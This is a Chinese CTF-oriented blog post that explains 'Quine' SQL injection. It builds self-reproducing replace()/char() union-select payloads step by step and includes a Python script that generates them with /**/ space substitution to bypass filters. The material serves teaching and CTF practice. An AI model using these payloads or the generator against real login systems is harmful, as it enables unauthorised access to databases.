sql注入 Quine注入解析

最新推荐文章于 2024-03-12 15:07:04 发布
最新推荐文章于 2024-03-12 15:07:04 发布
阅读量820 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: sql 数据库 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/130348274
版权

前言

quine注入,即查询的结果是查询的语句

首先看看如下sql语句会返回什么

select replace(".",char(46),".");

返回了一个点

匹配字符串".“中ascii码为46的字符并替换为”.“,也就是将”.“转换为”."并返回

继续看下面这个sql语句

select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

在这里插入图片描述很相似,但并不完全一致,查询出的结果是双引号的

此处将字符串 replace(“.”,char(46),“.”)

中ascii码为46的字符替换为另一字符串 replace(“.”,char(46),“.”)

也就是

replace(“replace(”.“,char(46),”.“)”,char(46),“replace(”.“,char(46),”.“)”)

观察原来的查询语句

replace(’ replace(“.”,char(46),“.”)',char(46),‘replace(“.”,char(46),“.”)’)

那么我们只需要将双引号替换成单引号就行

select replace("\"\"",char(34),char(39));

所以需要替换的字符串就变成了

'replace(replace(".",char(34),char(39)),char(46),".")'

这一步是替换单双引号

select replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39));

这一步是替换点为相关字符

select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

最终得到如上结果

这样我们确实是可以执行sql语句了,但是还需要解决注入的问题(这样只能堆叠)
所以加入union select的sql语句如下

1' union select replace(replace('1" union select replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1" union select replace(replace(".",char(34),char(39)),char(46),".")#')#

构造过程

构造过程如下
第一步拿基本语句作为替换语句
比如我想要 1’union select #

1"union select #

转单引号为双引号

1" union select replace(replace(".",char(34),char(39)),char(46),".")#

放入基本语句

第二步拼接

replace(replace('.',char(34),char(39)),char(46),'.')

replace(replace('1" union select replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1" union select replace(replace(".",char(34),char(39)),char(46),".")#')

补全

1' union select replace(replace('1" union select replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1" union select replace(replace(".",char(34),char(39)),char(46),".")#')#

题目特征

适用于如下的条件
image-20230424135507408image-20230424135535557

脚本

稍微用残疾的python水平写了个小脚本
勉强可用,减少了手动构造可能的出错

sql = input ("输入你的sql语句,不用写关键查询的信息  形如 1'union select #\n")
sql2 = sql.replace("'",'"')
base = "replace(replace('.',char(34),char(39)),char(46),'.')"
final = ""
def add(string):
    if ("--+" in string):
        tem = string.split("--+")[0] + base + "--+"
    if ("#" in string):
        tem = string.split("#")[0] + base + "#"
    return tem
def patch(string,sql):
    if ("--+" in string):
        return sql.split("--+")[0] + string + "--+"
    if ("#" in string):
        return sql.split("#")[0] + string + "#"

res = patch(base.replace(".",add(sql2)),sql).replace(" ","/**/").replace("'.'",'"."')

print(res)
丨Arcueid丨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
qmc.zip_Sharp_quine
09-23
Quine Mc Cluskey Algorithm in C Sharp
char码值对应列表大全
08-06 1554
Char("0") 为0的字符Char("1") Char("2") Char("3") Char("4") Char("5") Char("6") Char("7") 响铃Char("8") 回格Char("9") tab(水平制表符)Char("10") 换行Char("11") tab(垂直制表符)Char("12") 换页Char("13") 回车 chr(13)&chr...
HSCCTF-WEB-PWD(quine注入
最新发布
m0_74855736的博客
03-12 840
思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧。quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine。先将str里的双引号替换成单引号,再用str替换str里的间隔符。的双引号换成单引号,这样最后就不会出现引号不一致的情况了。中的间隔符使用双引号的原因是,
46-字符类型(char
fu_mou_ren的博客
09-30 79
插一句题外话,很多软件都有自己的快捷键,比如快速复制当前行的代码,删除当前行的代码,可以在自己软件的首选项里面看,或者修改,如果发现没有效果,可能是快捷键冲突了,需要你自己手动修改下,但是这种软件不和你游戏一样简单,需要自己上网找找攻略。如果不加空格输入一个数字,这个数字会自动转换成对应的Unicode对应字符输出。char里面的数据可以是单个字母,数字,中文,或者是制表符,这些都需要加空格。
SQL注入Quine注入
Aiwin的博客
06-29 2522
SQL注入Quine注入
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 528
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
char字符对应的ASCII码值
清晨的光ღ
06-12 4793
ASCII码值 字符 Char(“32”) 空格 SPACE Char(“33”) ! Char(“34”) " Char(“35”) # Char(“36”) $ Char(“37”) % Char(“38”) & Char(“39”) ’ Char(“40”) ( Char(“41”) ) Char(“42”) * Char(“43”) + Char(“44”) , Char(“4...
记录一次quine注入的学习
Zh1A0的博客
08-24 845
记录一次sql注入Quine注入的学习
SQL注入非常详细总结
dreamthe的博客
05-25 9906
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
QM.zip_qm_quine mccluskey
09-23
quine mccluskey code for logical circut
quine-relay:具有100多种编程语言的uroboros程序
02-16
奎因继电器 这是什么 这是一个生成Rust程序的Ruby程序,该生成Rust的程序生成Scala程序,该Scala程序生成...(总共通过128种语言)。REXX程序再次生成原始Ruby代码。 (如果要查看旧的50语言版本,请参阅分支。...
q---m.zip_Quine-McClusky
09-21
quine mccluskey c++ code
Quine-McCluskey C++实现
05-08
用C++实现Quine-McCluskey算法,输入模式为最小项的输入(输入最小项),本程序目前最大支持6个变量的化简,自己编写的程序~输出格式也是以最小项的模式,输出中的' -'表示这个变量不用显示,' 1' 代表最小项中有...
[HDCTF 2023]LoginMaster 复现 (记quine注入
qq_73767109的博客
04-24 805
benchmark时间盲注 [HDCTF 2023]LoginMaster 复现 quine注入解释
sql-lab 41-65关通关秘籍
weixin_46329549的博客
04-19 191
Less-41 41关和40关相同,相关步骤查看上篇博客。 Less-42 这一关通过查看源代码发现是对用户名进行了过滤,所以应该在password处进行注入,单引号错误。 Less-43 和42关相同不过是单引号加括号错误。 Less-44 同上,但是没有回显,单引号错误。 Less-45 同上,没有回显,单引号加括号型错误。 Less-46 从本题开始利用order by进行注入,对id进行降...
SQL注入
CSDNfengwang的博客
06-29 1244
目录 SQL注入原理理解 基于bool的检测 基于bool的盲注 基于报错 利用SQL注入漏洞,爆破用户名和密码 实验环境 kali-linux-2021、靶机Metasploitable2-Linux kaliIP地址:192.168.1.100 靶机IP地址:192.168.1.8 实验过程 SQL注入原理理解 一般用户登录用的SQL语句为:SELECT * FROM user WHERE username='admin' AND password='passwd',此处admi
SQL Query
HelloWorld
01-07 506
SQL QueryTablesQueries Tables CREATE TABLE YELP_USER ( Yelp_ID VARCHAR(10) PRIMARY KEY, Email VARCHAR(30) NOT NULL, FN VARCHAR(10) NOT NULL, LN VARCHAR(10) NOT NULL, DOB DATE NOT NULL, BirthPlace VARCHAR(30) NOT NULL, Gender CHA
quine-mccluskey method
11-30
Quine-McCluskey方法是一种用于最小化布尔函数的方法。它通过将布尔函数转换为最简化的多项式形式,以便更容易地实现或设计电路。 该方法的基本思想是使用卡诺图(Karnaugh map)的拓展版本来找到所有的重要项。首先,将布尔函数的真值表转化为卡诺图,然后根据卡诺图中的相邻位单元(最大化相邻的1)进行合并。这些合并操作可以产生更小的项,将真值表中不必要的变量进行消除,最终得到最简化的布尔表达式。 在使用Quine-McCluskey方法时,以下步骤是关键的: 1. 将布尔函数的真值表转换为卡诺图,并将1的位填入相应的格子中。 2. 找到卡诺图中所有的重要项-这些项代表着最后的布尔表达式中的主要组成部分。 3. 按照卡诺图的规则合并相邻位单元(最大化1的位数)。这些合并操作将产生更小的项,减少布尔表达式的复杂性。 4. 继续合并、消除和处理其他重要项,直到不能再进行合并操作为止。 5. 最后,根据卡诺图的结果,得到最简化的布尔表达式。 Quine-McCluskey方法是一种有效的方法,可以用于减少布尔函数的大小,并简化相应的电路设计过程。尽管手工计算非常费时且容易出错,但现代计算机系统可以自动化这一过程,使得设计人员能够更快速、准确地处理复杂的布尔函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值